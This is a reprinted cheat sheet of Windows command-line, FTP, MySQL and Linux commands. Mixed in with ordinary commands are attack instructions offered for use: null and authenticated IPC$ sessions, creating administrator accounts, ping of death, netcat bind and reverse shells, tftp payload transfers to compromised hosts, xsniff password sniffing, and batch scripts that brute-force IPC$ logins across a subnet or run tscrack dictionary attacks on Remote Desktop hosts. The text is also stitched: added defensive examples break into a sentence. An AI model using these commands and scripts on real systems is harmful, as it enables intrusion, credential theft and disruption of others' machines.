A command prompt is the working prompt in an operating system at which commands are entered; it varies between operating system environments.
In the Windows environment the command-line program is cmd.exe, a 32-bit command interpreter for Microsoft Windows systems, similar in role to the command interpreter of the Microsoft DOS operating system.
Reprinted. Tags: win + commands
I. Starting the CMD command prompt
"Start" → "Run" → type "cmd" and press Enter; or press Win + R (both keys together) to open the "Run" window → type "cmd" and press Enter.
II. My own commonly used CMD commands
mstsc: opens a remote desktop connection.
services.msc: opens the local service settings.
notepad: Open Notepad.
control: opens the control panel.
regedit: opens the registry list editor.
ncpa.cpl: opens Network Connections on Windows 10 (or use Win + X)
III. Windows CMD commands
3.1 System
gpedit.msc - Group Policy
sndrec32 - Sound Recorder
nslookup - IP address detector: a command-line tool for checking that the DNS servers on a network resolve domain names correctly. Available in Windows NT/2000/XP, not integrated in Windows 98.
explorer - opens Explorer
logoff - log off
shutdown - shut down after a 60-second countdown
lusrmgr.msc - Local Users and Groups
services.msc - local service settings
oobe/msoobe /a - check whether XP is activated
notepad - open Notepad
cleanmgr - Disk Cleanup (junk file cleanup)
net start messenger - start the Messenger service
compmgmt.msc - Computer Management
net stop messenger - stop the Messenger service
conf - start NetMeeting
dvdplay - DVD player
charmap - start Character Map
diskmgmt.msc - Disk Management utility
calc - start Calculator
dfrg.msc - Disk Defragmenter
chkdsk.exe - Chkdsk disk check
devmgmt.msc - Device Manager
regsvr32 /u *.dll - unregister a DLL so it stops being loaded
drwtsn32 - System Doctor (Dr. Watson)
rononce -p - power off in 15 seconds
dxdiag - check DirectX information
regedt32 - Registry Editor
msconfig.exe - System Configuration Utility
rsop.msc - Resultant Set of Policy (group policy)
mem.exe - show memory usage
regedit.exe - registry
winchat - the LAN chat that ships with XP
progman - Program Manager
winmsd - System Information
perfmon.msc - Performance Monitor
winver - check the Windows version
sfc /scannow - scan system files for errors and restore them (Windows File Protection)
taskmgr - Task Manager (2000/XP/2003)
wmimgmt.msc - open Windows Management Instrumentation (WMI)
wupdmgr - Windows Update
wscript - Windows Script Host settings
write - WordPad
wiaacmgr - Scanner and Camera Wizard
mplayer2 - simple Windows Media Player
mspaint - Paint
mstsc - Remote Desktop Connection
magnify - Magnifier utility
mmc - open the Microsoft Management Console
mobsync - synchronization
iexpress - Trojan bundling tool, ships with the system
fsmgmt.msc - Shared Folders manager
utilman - Utility Manager (accessibility)
dcomcnfg - open Component Services
ddeshare - open DDE Share settings
osk - open the On-Screen Keyboard
odbcad32 - ODBC Data Source Administrator
ntbackup - system backup and restore
narrator - screen Narrator
ntmsmgr.msc - Removable Storage manager
ntmsoprq.msc - Removable Storage operator requests
netstat -an - (TCP) check active connections and listening ports
syncapp - create a Briefcase
sysedit - System Configuration Editor
sigverif - File Signature Verification
ciadv.msc - Indexing Service
shrpubw - create shared folders
secpol.msc - Local Security Policy
syskey - system encryption; once enabled it cannot be reverted; double-password protection for the Windows XP system
sndvol32 - volume control
sfc.exe - System File Checker
tourstart - XP tour (the Windows XP tour program that appears after installation completes)
eventvwr - Event Viewer
eudcedit - Private Character Editor
packager - Object Packager
cliconfg - SQL Server Client Network Utility
clipbrd - Clipboard Viewer
certmgr.msc - Certificates management utility
regsvr32 /u zipfldr.dll - remove ZIP folder support
cmd.exe - CMD command prompt
3.2 net
net use \\ip\ipc$ "" /user:"" Create a null IPC$ session
net use \\ip\ipc$ "password" /user:"username" Create an authenticated IPC$ session
net use h: \\ip\c$ "password" /user:"username" Log in directly and map the other side's C: locally as H:
net use h: \\ip\c$ Map the other side's C: locally as H: after logging in
net use \\ip\ipc$ /del Delete the IPC$ session
net use h: /del Delete the H: mapping of the other side's drive
net user username password /add Create a user
net user guest /active:yes Activate the guest account
net user List the accounts on the machine
net user accountname View an account's properties
net localgroup administrators username /add Add "username" to the Administrators group, giving it administrator privileges
net start List the services that are running
net start servicename Start a service (e.g. net start telnet, net start schedule)
net stop servicename Stop a service
net time \\targetip View the other host's time
net time \\targetip /set Synchronize the local clock with the host at "target ip"; add /yes to skip the confirmation prompt
net view List the shares open on the local LAN
net view \\ip List the shares open on the other host
net config Display system network settings
net logoff Disconnect shares
net pause servicename Pause a service
net send ip "text message" Send a message to the other party
net ver Type and information about the network connection in use on the LAN
net share View locally enabled shares
net share ipc$ Enable the ipc$ share
net share ipc$ /del Delete the ipc$ share
net share c$ /del Delete the C: share
net user guest 12345 Change the guest password to 12345 after logging in as guest
net password password Change the system login password
netstat -a List open ports; commonly used as netstat -an
netstat -n View network connections per port; commonly used as netstat -an
netstat -v View what is going on
netstat -p protocol View usage of one protocol, e.g. netstat -p tcp
netstat -s View usage statistics for all protocols in use
nbtstat -A ip If one of ports 136 to 139 on the other party is open, shows the username of the other party's most recent login
tracert -parameter ip (or computer name) Trace the route taken by packets; the parameter "-w number" sets the timeout interval
3.3 Computer parameters / processes / IP / files
ping ip (or domain name) Sends 32 bytes of data (the default size) to the other host. Parameters: "-l packetsize" sets the packet size; "-n count" sets the number of packets to send; "-t" pings continuously.
ping -t -l 65550 ip Ping of death (sending a packet larger than 64 KB continuously is the ping of death)
ipconfig (winipcfg on Windows 95/98) View the local IP address on Windows NT and XP; the "/all" parameter shows all configuration information
tlist -t Display processes as a tree (an additional system tool, not installed by default; found in the Support\Tools folder of the installation media)
kill -F processname The -F parameter forces a process to end (also an additional Support\Tools tool, not installed by default)
del /F filename The /F parameter allows deleting read-only files. /AR, /AH, /AS, /AA delete read-only, hidden, system and archive files respectively; /A-R, /A-H, /A-S, /A-A delete everything except read-only, hidden, system or archive files. For example, "del /AR *.*" deletes all read-only files in the current directory and "del /A-S *.*" deletes all files in the current directory except system files
del /S /Q directory (or rmdir /S /Q directory) /S deletes the directory together with all its subdirectories and files; /Q suppresses the confirmation prompt so the directory is deleted directly. (Both commands do the same thing.)
move sourcepath\filename destinationpath\filename Move a file; with /y, an existing file of the same name in the destination directory is overwritten without prompting
fc one.txt two.txt > 3st.txt Compare two files and write the differences to 3st.txt. ">" and ">>" are redirection operators.
at id Start a registered scheduled task
at /delete Stop all scheduled tasks; with the /yes parameter, stop them without confirmation
at id /delete Stop a registered scheduled task
at View all scheduled tasks
at \\ip time programname (or a command) /r Run a program on the other host at the given time and restart the computer
finger username@host See which users have logged in recently
telnet ip port Log in to a remote server; the default port is 23
open ip Connect to an IP (a command used after entering telnet)
telnet Typing telnet alone on the local machine enters the local telnet client
copy path\filename1 path\filename2 /y Copy file1 to the specified directory as file2; with /y, an existing file in the directory is overwritten without confirmation
copy c:\srv.exe \\ip\admin$ Copy the local c:\srv.exe to the other side's admin$ share
copy 1st.jpg /b + 2st.txt /a 3st.jpg Hide the contents of 2st.txt inside 1st.jpg, producing the new file 3st.jpg. Note: leave three blank lines at the top of 2st.txt. Parameters: /b means binary file, /a means ASCII file
copy \\ip\admin$\svv.exe c:\ (or copy \\ip\admin$\*.* c:\) Copy the svv.exe file (or all files) from the other side's admin$ share to the local C:\
xcopy source-file-or-directory-tree destination-directory Copy files and directory trees; with the /Y parameter it does not prompt before overwriting files with the same name.
The /E parameter copies the directory together with its subdirectories to the destination.
tftp -i ownip get server.exe c:\server.exe After logging in, download server.exe from the host at "ip" to the target host as c:\server.exe (when a compromised host is used as a stepping stone, use that host's IP). Parameters: -i means transfer in binary mode, for example for exe files; without -i the transfer is in ASCII mode (for text files).
tftp -i otherip put c:\server.exe After logging in, upload the local c:\server.exe to the host
ftp ip port Upload files to the server or perform file operations; the default port is 21. bin means binary transfer (for executable files); the default is ASCII transfer (for text files).
route print Display the IP routing table, mainly the network address (Network Address), subnet mask (Netmask), gateway address (Gateway Address) and interface address (Interface)
arp View and manage the ARP cache; ARP is the address resolution protocol, responsible for resolving an IP address to a physical MAC address. arp -a shows the full table
start programname-or-command /max or /min Open a new window and run a program or command maximized (or minimized)
mem View memory usage
attrib filename (or directoryname) View the attributes of a file (directory)
attrib filename -A -R -S -H (or +A +R +S +H) Remove (add) the archive, read-only, system and hidden attributes of a file; + adds an attribute, - removes it
dir View files. Parameters: /Q shows which system user owns each file and directory; /T:A shows the last access time; /T:W shows the last modification time
date /t, time /t With this parameter, "date /t" and "time /t" only display the current date and time without prompting for a new one
set variablename=value Set an environment variable
set Display all current environment variables
set p (or another character) Display all environment variables whose names begin with p (or the given character)
pause Pause a batch program and display: Press any key to continue...
if Perform conditional processing in a batch program (see the if command and variables below for details)
goto label Direct cmd.exe to the line carrying the label in the batch program (the label must be on its own line and begin with a colon, e.g. the label ":start")
call path\batchfile Call another batch program from a batch program (see call /? for details)
for Execute a command for each file in a set (see the for command and variables below for details)
echo on or off Turn command echoing on or off; echo without parameters shows the current echo setting
echo message Display a message on the screen
echo info >> pass.txt Append "info" to the file pass.txt
findstr "Hello" aa.txt Find the string "Hello" in the file aa.txt
find filename Find a file
title titlename Change the title of the CMD window
color value Set the console foreground and background colors; 0 = black, 1 = blue, 2 = green, 3 = light green, 4 = red, 5 = purple, 6 = yellow, 7 = white, 8 = gray, 9 = pale blue, A = pale green, B = pale light green, C = pale red, D = pale purple, E = pale yellow, F = bright white
prompt name Change the prompt displayed by cmd.exe (e.g. change the C:\> prompt to EntSky)
ver Display version information in the DOS window
winver Pop up a window showing version information (memory size, system version, patch level, computer name)
format disk /FS:type Format a disk; type is FAT, FAT32 or NTFS. Example: format D: /FS:NTFS
md directoryname Create a directory
replace sourcefile directory-of-file-to-replace Replace a file
ren oldfilename newfilename Rename a file
tree Display the directory structure as a tree; with the /f parameter it also lists the file names in each folder
type filename Display the contents of a text file
more filename Display a file's output one screen at a time
doskey command-to-lock=string Lock a command; doskey command-to-unlock= Unlock it. doskey is provided for DOS (it edits the command line, recalls win2k commands, and creates macros). For example, lock the dir command: doskey dir=entsky (doskey dir=dir does not work); unlock it: doskey dir=
taskmgr Call up Task Manager
chkdsk /F D: Check disk D: and display a status report; /F fixes errors on the disk
tlntadmn Telnet service administration: type tlntadmn, choose 3, then 8, to change the telnet service's default port 23 to any other port
exit Exit cmd.exe or the current batch script; with the /B parameter only the current batch script exits rather than cmd.exe
path path-to-executables Set the search path for executable files
cmd Start a new win2k command interpreter window. Parameters: /E:OFF and /E:ON disable and enable command extensions; see cmd /?
regedit /s registryfile Import a registry file; /S means quiet mode, with no prompts
regedit /e registryfile Export the registry
cacls filename parameters Display or modify file access control lists (ACLs), for NTFS volumes. Parameters: /D username denies the user access; /P username:perm replaces the specified user's access; /G username:perm grants the specified user access; perm can be N none, R read, W write, C change (write), F full control. Example: cacls D:\test.txt /D pub denies the pub user access to D:\test.txt
cacls filename View the list of users' permissions on the file
REM text Add a comment to a batch file
netsh View or change the local network configuration
3.4 IIS Service Commands
iisreset /reboot Reboot the win2k computer (but a message indicating that the system will reboot appears)
iisreset /start or stop Starts (stops) all Internet services.
iisreset /restart Stops and then restarts all Internet services.
iisreset /status Displays the status of all Internet services.
iisreset /enable or disable Enables (disables) the restart of Internet services on the local system
iisreset /rebootonerror When starting, stopping, or restarting Internet services, reboots if an error occurs
iisreset /noforce will not force termination of Internet service if it cannot be stopped.
iisreset /timeout val Set the timeout (in seconds) to wait for the Internet services to stop; when it expires, the computer reboots if the /rebootonerror parameter is specified. The defaults are 20 seconds for restart, 60 seconds for stop, and 0 seconds for reboot.
3.5 FTP commands (detailed description follows)
The command-line format of ftp is:
ftp -v -d -i -n -g [hostname]
-v Display all response messages from the remote server
-d Use debugging mode
-i Turn off interactive prompting during multiple-file transfers
-n Suppress automatic login, i.e. do not use .netrc files
-g Disable filename globbing
help [command] or ? [command] to view the command description
bye or quit Terminate the host FTP process and exit the FTP management mode.
pwd List the current remote host directory
put or send local filename [filename uploaded to host] Transfers a local file to a remote host
get or recv [remote host filename] [filename after downloading locally] transfer from remote host to local host
mget [remote-files] Receive a batch of files from a remote host to the local host
mput local-files Transfers a batch of files from the local host to the remote host.
dir or ls [remote-directory] [local-file] Lists files in the current remote host directory. If there is a local file, write the result to the local file.
ascii Sets file transfer in ASCII (default)
bin or image Sets the file to be transferred as a binary.
bell Alarm for each completed file transfer
cdup Return to previous directory
close Interrupts the ftp session with the remote server (corresponds to open).
open host [port] Create a connection to the specified ftp server; a connection port can be specified.
delete Deletes a file from the remote host.
mdelete [remote-files] Delete a batch of files
mkdir directory-name Create a directory in the remote host
rename [from] [to] Changes the name of a file on the remote host.
rmdir directory-name Removes the directory from the remote host.
status Displays the current FTP status
system Displays the remote host system type
user user-name [password] [account] Re-login to the remote host with a different user name.
open host [port] Re-establishing a new connection
prompt Interactive prompt mode
macdef Define macro commands
lcd Change the working directory on the local host; with no argument, go to the current user's HOME directory
chmod Change file permissions on remote hosts
case When ON, the file name copied to the local machine with the MGET command is converted to lowercase letters.
cd remote-dir Enter the remote host directory
cdup Enter the parent directory of the remote host directory
! Execute an interactive shell on the local machine; exit returns to the ftp environment. For example: !ls *.zip
3.6 MySQL commands
mysql -h hostaddress -u username -p password Connect to MySQL; on a fresh installation the superuser root has no password.
(Example: mysql -h110.110.110.110 -uroot -p123456)
(Note: there need be no space between -u and root; the same applies to the other options)
exit Exit MySQL
mysqladmin -u username -p oldpassword password newpassword Change a password
grant select on database.* to username@loginhost identified by "password"; Add a new user. (Note: unlike the commands above, the commands that follow end with a semicolon because they are run inside the MySQL environment)
show databases; Show the list of databases. Initially there are only two: mysql and test. mysql is a very important library that holds MySQL's system information; it is the library actually used to change passwords and add new users.
use mysql; Switch to the mysql library
show tables; Show the tables in the library
describe tablename; Display the structure of a table
create database databasename; Create a library
use libraryname; Switch to a library
create table tablename (list of field definitions); Create a table
drop database databasename; drop table tablename; Delete a library or a table
delete from tablename; Empty a table
select * from tablename; Show the records in a table
mysqldump --opt school > school.bbb Back up a database (run from the DOS prompt in the mysql\bin directory). Note: this backs up the school database to the file school.bbb, a text file whose name is arbitrary; open it and you will make a new discovery.
3.7 New commands on Windows 2003 (practical part):
shutdown /parameters Shut down or reboot the local or remote host.
Parameters: /S shut down the host; /R reboot the host; /T number set the delay, from 0 to 180 seconds; /A cancel a pending shutdown; /M \\IP specify the remote host.
Example: shutdown /r /t 0 Restart the local host immediately (no delay)
taskkill /parameters processname-or-pid Terminate one or more tasks and processes.
Parameters: /PID the pid of the process to terminate (use the tasklist command to get each process's pid); /IM the image name of the process to terminate; /F force termination; /T terminate the specified process and the child processes it started.
tasklist Display the processes, services and process identifiers (PIDs) of everything currently running on the local or remote host.
Parameters: /M lists the DLL files loaded by each process; /SVC shows the service hosted by each process; with no parameter only the current processes are listed.
3.8 Basic Linux commands (note: case sensitive)
uname Display version information (like ver on Win2K)
dir Show the files in the current directory; ls -al also shows hidden files (like dir on Win2K)
pwd Show the location of the current directory
cd Change directory; cd .. returns to the parent directory (note the space between cd and ..); cd / returns to the root directory
cat filename View the contents of a file
cat > abc.txt Write input to the file abc.txt
more filename Display a text file page by page
cp Copy files
mv Move files
rm filename Delete files; rm -r directoryname deletes a directory together with its subdirectories
mkdir directoryname Create a directory
rmdir Remove a subdirectory that contains no files
chmod Set access permissions on a file or directory
grep Search for strings in files
diff Compare files
find Search for files
date Current date and time
who Show who is currently using the same machine as you, and where and when they logged in
w Show details about the users currently logged in
whoami Show your own account name
groups Show a user's groups
passwd Change password
history Show the commands you have entered
ps Show process status
kill Stop a process
gcc Compile files written in C (commonly used by hackers)
su Switch to the privileges of the specified user
telnet IP Telnet to the other host (like win2k); when the bash$ prompt appears the connection has succeeded
ftp Connect to an ftp server (like win2k)
3.9 Batch commands and variables
3.9.1 The for command and variables: basic format
FOR /parameter %variable IN (set) DO command [command_parameters]
%variable: a single-letter replaceable parameter, e.g. %i. Inside a batch file it is written %%i; an environment variable is referenced as %i%. Variable names are case sensitive (%i is not the same as %I).
A batch file can handle the parameters %0 to %9, ten in all: %0 is the batch file's own name by default, %1 is the first value entered on its command line, and likewise %2 to %9 are the second to ninth values. Example: in "net use \\ip\ipc$ pass /user:user", ip is %1, pass is %2 and user is %3.
(set): for example (d:\user.txt), or (1 1 254) and (1 -1 254). In "(1 1 254)" the first "1" is the start value, the second "1" the step and "254" the end value, i.e. from 1 to 254; "(1 -1 254)" means from 254 to 1.
command: the command to execute for each element, such as a net use command; to execute more than one command, separate them with &.
command_parameters: parameters or command-line switches for the command.
IN (set): take the values from (set); DO command: execute the command.
Parameters: /L means (set) is a numeric range in incremental form; /F means (set) is a file, e.g. (d:\pass.txt), and values are read from it until the file is exhausted.
Usage examples:
@echo off
echo Format: test.bat *.*.* > test.txt
for /L %%G in (1 1 254) do echo %1.%%G >> test.txt & net use \\%1.%%G\ipc$ /user:administrator | find "Command completed successfully" >> test.txt
Save as test.bat. Explanation: attempts, in turn, to establish an IPC$ connection with an empty administrator password to the 254 IPs of the given class C segment, and saves the IP in test.txt when it succeeds.
/L means a numeric range (i.e. from 1 to 254 or 254 to 1). The first three octets of the IP, entered as *.*.*, are the batch file's %1; %%G is the loop variable (the last octet); & separates the echo and net use commands; | pipes the result of net use into find to check for the "Command completed successfully" message; %1.%%G is the full IP address; (1 1 254) gives the start value, the step and the end value.
@echo off
echo Format: ok.bat ip
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200
Save as ok.bat. Description: after entering an IP, tries each user name in the dictionary file d:\user.dic with the passwords in pass.dic until the values in the file are exhausted. %%i is the user name; %1 is the IP address entered.
3.9.2 The if command and variables: basic format
IF [not] errorlevel number command The condition is true if the program that just ran returned an exit code equal to or greater than the given number.
Example: "IF errorlevel 0 command" runs the following command if the value returned by the program was 0; "IF not errorlevel 1 command" runs the following command if the value returned by the program was not 1.
0 means detected and executed successfully (true); 1 means not detected, not executed (false).
IF [not] string1==string2 command If the text strings match (string1 equals string2), execute the following command.
Example: "if "%2%"=="4" goto start" means: if the second variable entered is 4, execute the following commands (note: the variable is referenced as %variablename% and wrapped in " ")
IF [not] exist filename command If the file exists, execute the following command.
Example: "if not exist nc.exe goto end" means: if the file nc.exe is not found, jump to the ":end" label.
IF [not] errorlevel number command else command, or IF [not] string1==string2 command else command, or IF [not] exist filename command else command: the command after else is executed when the preceding condition does not hold. Note: else must be on the same line as if to take effect. When the command is a del command, enclose the whole del command in < >, because del can only be executed on a line of its own and < > makes it a separate line; for example: "if exist test.txt.
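The following batch file is an added example, not part of the original post: it exercises the %0/%1 parameters, for /F, for /L, if exist, if errorlevel, else on the same line, and the pipe into find that 3.9.1 and 3.9.2 describe, on a defensive task (checking which of your own hosts answer a ping). The host list file name and its contents are assumptions for this example.

```batch
@echo off
setlocal enabledelayedexpansion
rem Added example, not from the original post. Usage: hostcheck.bat hosts.txt
rem hosts.txt is a constructed list of your own hosts, one name or IP per line.
rem The script pings each host up to three times and writes a reachability report.

rem %1 is the first argument and %0 the script name, as described in 3.9.1.
if "%1"=="" (
    echo Usage: %0 hostlist.txt
    goto :end
)

rem if exist with else: the else clause must stay on the same line as the if.
if not exist "%1" (echo Host list %1 not found & goto :end) else (echo Checking hosts from %1)

rem A single redirect overwrites the report, a double redirect appends to it.
echo Reachability report for %1 > report.txt

rem for /F reads the list file line by line; lines starting with # are skipped.
for /F "usebackq eol=# tokens=1" %%H in ("%1") do (
    set REACHABLE=0
    rem for /L counts 1, 2, 3: up to three ping attempts for the current host.
    for /L %%N in (1 1 3) do (
        if !REACHABLE!==0 (
            rem find returns errorlevel 0 only if a reply line containing TTL= was seen,
            rem which is more reliable than the exit code of ping itself.
            ping -n 1 -w 1000 %%H | find "TTL=" >nul
            if not errorlevel 1 set REACHABLE=1
        )
    )
    if !REACHABLE!==1 (echo %%H reachable >> report.txt) else (echo %%H unreachable after 3 attempts >> report.txt)
)

echo Done. Results are in report.txt
type report.txt

:end
endlocal
```

Delayed expansion (!REACHABLE!) is needed because %REACHABLE% inside a parenthesized block is expanded once, before the loop runs.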
3.10 External commands (nc.exe)
Note: commands external to the system (all require downloading the related tools)
Swiss army knife: nc.exe
Parameters:
-h Show help
-d Background mode
-e prog Redirect to a program; executes as soon as a connection is made [dangerous]
-i secs Delay interval
-l Listen mode for inbound connections
-L Listen mode that keeps listening after a connection closes, until Ctrl+C
-n Use numeric IP addresses only, not domain names
-o file Record a hexadecimal dump of the transfer to a file
-p port Local port number
-r Randomize local and remote ports
-t Telnet negotiation
-u UDP mode
-v Verbose output; -vv is more verbose
-w secs Timeout interval
-z Zero-I/O mode (for port scanning)
3.10.1 Basic usage:
nc -nvv 192.168.0.1 80 Connect to port 80 on host 192.168.0.1
nc -l -p 80 Open local TCP port 80 and listen on it
nc -nvv -w2 -z 192.168.0.1 80-1024 Scan ports 80-1024 of 192.168.0.1
nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe Bind the remote host's cmd shell to its TCP port 5354
nc -t -e c:\winnt\system32\cmd.exe 192.168.0.2 5354 Bind the remote host's cmd shell and connect it back to port 5354 on 192.168.0.2
3.10.2 Advanced usage:
nc -L -p 80 Honeypot 1: open port 80 and keep listening until Ctrl+C
nc -L -p 80 > c:\log.txt Honeypot 2: open port 80 and keep listening until Ctrl+C, writing the output to c:\log.txt
nc -L -p 80 < c:\honeyport.txt Honeypot 3-1: open port 80 and keep listening until Ctrl+C, sending the contents of c:\honeyport.txt into the pipe; this can also be used to transfer files
type c:\honeyport.txt | nc -L -p 80 Honeypot 3-2: open port 80 and keep listening until Ctrl+C, with the contents of c:\honeyport.txt piped in; this can also be used to transfer files
Locally: nc -l -p localport
On the other host: nc -e cmd.exe localIP -p localport (win2K)
nc -e /bin/sh localIP -p localport (Linux, Unix) Reverse connection, to get through the other host's firewall
Locally: nc -d -l -p localport < path-and-name-of-file-to-send
On the other host: nc -vv localIP localport > path-and-name-of-file-to-store Transfer the file to the other host
Remarks:
| Pipe command
< or > Redirection. "<", e.g. tlntadmn < test.txt, feeds the contents of test.txt to the tlntadmn command
@ Execute the command after @ without displaying it (background execution). Example: @dir c:\winnt >> d:\log.txt runs dir in the background and stores the result in d:\log.txt
Difference between > and >>: ">" overwrites; ">>" appends.
For example, run @dir c:\winnt >> d:\log.txt twice and @dir c:\winnt > d:\log.txt twice and compare: with >> both results are saved, while with > only one result remains, because the second run overwrote the first.
3.11 xscan.exe
Scanning tool: xscan.exe
Basic format
xscan -host <startIP>[-<endIP>] <check-items> [other options] Scan all hosts in the segment from start IP to end IP.
xscan -file <hostlistfile> <check-items> [other options] Scan all hosts listed in the host list file.
Check items
-active Detects if the host is alive
-os Detect remote OS type (via NETBIOS and SNMP protocols)
-port Detects the port status of common services
-ftp Detecting FTP weak passwords
-pub Detecting FTP service write privileges for anonymous users
-pop3 Detecting weak POP3-Server passwords
-smtp Detects SMTP-Server Vulnerabilities
-sql Detecting weak passwords on SQL-Server
-smb Detecting weak passwords on NT-Server
-iis Detecting IIS Encoding/Decoding Vulnerabilities
-cgi detects CGI vulnerabilities
-nasl Load the Nessus attack script.
-all Test all of the above
Other Options
-i Adapter number Sets the network adapter, <adapter number> can be obtained with the “-l” parameter.
-l Show all network adapters
-v Display detailed scanning progress
-p Skip unresponsive hosts
-o Skip hosts with no open ports detected
-t Concurrent Threads,Concurrent Hosts Specify the maximum number of concurrent threads and concurrent hosts, the default is 100,10.
-log filename Specify the scan report filename (suffix: TXT or HTML format file)
3.11.1 Examples of usage
xscan -host 192.168.1.1-192.168.255.255 -all -active -p Detects all vulnerabilities on hosts in the 192.168.1.1-192.168.255.255 segment, skipping unresponsive hosts.
xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o Detects the standard port status and NT weak-password users of hosts in the 192.168.1.1-192.168.255.255 segment, with a maximum of 150 concurrent threads, skipping hosts with no open ports detected.
xscan -file hostlist.txt -port -cgi -t 200,5 -v -o Detects the standard port status and CGI vulnerabilities of all hosts listed in hostlist.txt, with a maximum of 200 concurrent threads and up to 5 hosts at a time, shows detailed progress, and skips hosts with no open ports detected.
3.12 IX: (xsniff.exe)
Command-line sniffer: xsniff.exe
Captures FTP/SMTP/POP3/HTTP passwords on the LAN
Parameter description
-tcp Output TCP datagrams
-udp Output UDP datagrams
-icmp Output ICMP datagram
-pass Filtering password information
-hide Run in background
-host Resolve hostname
-addr <IP address> Filters by IP address
-port <port> Filters by port
-log <filename> Saves the output to a file
-asc Output in ASCII
-hex Output in hexadecimal
3.12.1 Examples of usage
xsniff.exe -pass -hide -log pass.log Runs in the background, sniffs passwords and saves them in the file pass.log.
xsniff.exe -tcp -udp -asc -addr 192.168.1.1 Sniffs 192.168.1.1, filters TCP and UDP messages and outputs them in ASCII.
Terminal Services password cracker: tscrack.exe
Parameter description
-h Displays usage help
-v Displays version information
-s Prints the cracking capability on the screen
-b Beeps when a password is wrong
-t Issues multiple connections at the same time (multithreading)
-N Prevents System Log entries on the targeted server
-U Uninstalls (removes the tscrack component)
-f Uses the password given after -f
-F Interval (frequency)
-l Uses the username given after -l
-w Uses the password dictionary given after -w
-p Uses the password given after -p
-D Login main page
3.12.2 Examples of usage
tscrack 192.168.0.1 -l administrator -w pass.dic Remotely cracks the host's administrator login password using a password dictionary file.
tscrack 192.168.0.1 -l administrator -p 123456 Remotely logs in as the administrator user on 192.168.0.1 with the password 123456.
@if not exist ipcscan.txt goto noscan
@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i
:noscan
@echo 3389.txt no find or scan faild
(① Save as 3389.bat.) (This assumes that SuperScan or another port scanner has already been used to save the list of hosts with port 3389 open into the file 3389.txt.)
3389.bat means: take each IP from 3389.txt in turn and run hack.bat with it.
@if not exist tscrack.exe goto noscan
@tscrack %1 -l administrator -w pass.dic >>rouji.txt
:noscan
@echo tscrack.exe no find or scan faild
(② Save as hack.bat.) (Just run 3389.bat; 3389.bat, hack.bat, 3389.txt, pass.dic and tscrack.exe must be in the same directory, then wait for the result.)
hack.bat means: run tscrack.exe against each host in 3389.txt to crack the administrator password with the dictionary, and save the cracking results in the file rouji.txt.
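The defender's side of the dictionary attack above, as an added example that is not part of the original page: detection logic run over constructed logon-failure records modelled on Windows Security event 4625 with logon type 10 (RemoteInteractive, i.e. Terminal Services), flagging a source that hammers one account and a later success from that source. The record layout, addresses, account names and thresholds are all constructed.

```python
"""Added example, not part of the original page: detection logic for the
dictionary attack described above, run over constructed logon-failure
records modelled on Windows Security event 4625 with logon type 10
(RemoteInteractive, i.e. Terminal Services). Record layout, addresses,
account names and thresholds are constructed for this example."""
from collections import defaultdict, deque
from datetime import datetime

THRESHOLD = 5   # failures per (source, account) before alerting
WINDOW = 60     # seconds

# Constructed sample records: timestamp, event id, account, logon type, source IP
SAMPLE_LOG = """\
2024-05-01 10:00:01,4625,administrator,10,192.168.0.50
2024-05-01 10:00:02,4625,administrator,10,192.168.0.50
2024-05-01 10:00:03,4625,administrator,10,192.168.0.50
2024-05-01 10:00:04,4625,administrator,10,192.168.0.50
2024-05-01 10:00:05,4625,administrator,10,192.168.0.50
2024-05-01 10:05:00,4625,alice,10,192.168.0.77
2024-05-01 10:06:00,4624,administrator,10,192.168.0.50
"""

def parse_record(line):
    ts, event_id, account, logon_type, src = line.split(",")
    return (datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), int(event_id),
            account.lower(), int(logon_type), src)

def detect_bruteforce(log_text, threshold=THRESHOLD, window=WINDOW):
    """Return (alerts, cracked): alerts maps (src, account) to the time the
    burst crossed the threshold; cracked holds pairs that logged on after it."""
    recent = defaultdict(deque)   # (src, account) -> failure timestamps in window
    alerts, cracked = {}, set()
    for line in log_text.splitlines():
        ts, event_id, account, logon_type, src = parse_record(line)
        if logon_type != 10:
            continue              # only Terminal Services / RDP logons
        key = (src, account)
        if event_id == 4624:
            if key in alerts:
                cracked.add(key)  # success after a burst of failures
        elif event_id == 4625:
            q = recent[key]
            q.append(ts)
            while (ts - q[0]).total_seconds() > window:
                q.popleft()       # slide the window forward
            if len(q) >= threshold and key not in alerts:
                alerts[key] = ts
    return alerts, cracked
```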
3.13 Other
Shutdown.exe
Shutdown <IP address> t:20 Shuts down the other side's NT machine automatically after 20 seconds. (This tool ships with Windows 2003; under Windows 2000 it must be downloaded before it can be used. It was described in detail in the earlier Windows 2003 DOS commands section.)
fpipe.exe (TCP port redirection tool)
This was explained in detail in the second article (port redirection to bypass firewalls).
fpipe -l 80 -s 1029 -r 80 When someone scans your port 80, the result they get is exactly the same host information.
fpipe -l 23 -s 88 -r 23 <destination IP> Redirects Telnet requests to local port 23 to the destination IP: the request is sent out through local port 88 to port 23 of the destination IP (when you establish a Telnet session with the target IP, your machine uses port 88 to connect to it). Then telnet 127.0.0.1 (the local IP) connects directly to port 23 of the target IP.
OpenTelnet.exe (tool to remotely enable Telnet)
opentelnet.exe <IP> <account> <password> <NTLM authentication method> <Telnet port> (no need to upload ntlm.exe to disable Microsoft's authentication method). Once the other side's Telnet service has been enabled remotely, you can connect to it with telnet <ip>.
NTLM authentication method: 0: no NTLM authentication; 1: try NTLM authentication first and fall back to username and password if it fails; 2: use only NTLM authentication.
ResumeTelnet.exe (another tool that comes with OpenTelnet)
resumetelnet.exe <IP> <account> <password> After having connected to the other side with Telnet, use this command to restore the other side's Telnet settings and shut down its Telnet service at the same time.
3.14 FTP Commands in Detail
FTP is one of the commands Internet users run most often; becoming familiar with FTP's internal commands and applying them flexibly makes the user's work much easier and gets twice the result for half the effort. If you want to use FTP for background downloads, you must learn the FTP commands.
The command line format for FTP is:
ftp -v -d -i -n -g [hostname], where
-v Displays all response messages from the remote server;
-n Suppresses automatic login, i.e. does not use the .netrc file;
-i Turns off interactive prompting during multiple-file transfers;
-d Enables debugging mode;
-g Disables filename globbing (wildcard expansion).
The internal commands used by FTP are as follows (square brackets indicate optional items).
1. ! [cmd [args]]: Execute an interactive shell on the local machine; exit returns to the ftp environment. Example: !ls *.zip
2. $ macro-name [args]: Execute the macro macro-name.
3. account [password]: Provide the additional password required to access system resources after a successful login to the remote system.
